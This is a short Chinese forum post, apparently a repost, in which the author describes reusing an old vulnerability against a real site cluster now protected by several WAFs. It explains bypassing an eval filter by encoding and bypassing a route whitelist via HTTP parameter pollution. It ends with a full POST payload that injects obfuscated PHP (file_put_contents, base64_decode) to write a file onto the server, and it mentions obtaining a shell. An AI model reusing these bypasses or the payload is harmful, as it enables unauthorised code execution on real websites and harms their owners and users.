xChar
·a month ago

原文:https://mp.weixin.qq.com/s/GWKhrMilIXOeUgO6CyUUqQ

已授权转载,有兴趣可以关注下公众号

某集约化站群去年留的漏洞,今年用的时候发现被拦截了。吐槽下,这是彻底疯狂了吗,百度云waf、华为云waf、安全狗都弄一起是什么鬼啊.....

waf bypass

比较简单,过滤了eval编码下就行。

image

路由白名单限制bypass

随意请求访问发现存在路由限制,只允许访问指定路径。

640

但是不可能所有路径都写死,比如搜索功能需要接收用户输入内容,抓包确认搜索接口可以正常使用且不会触发路由白名单限制。

640

因此猜测可以利用参数污染绕过限制,例如:

#插入同名参数
/index.php?name=bob&name=rose

#后端实际可能接收
name=rose

getshell后查看代码,确认该接口匹配的是任意内容。

Snipaste_2024-10-20_18-15-37

最终payload

POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'
Loading comments...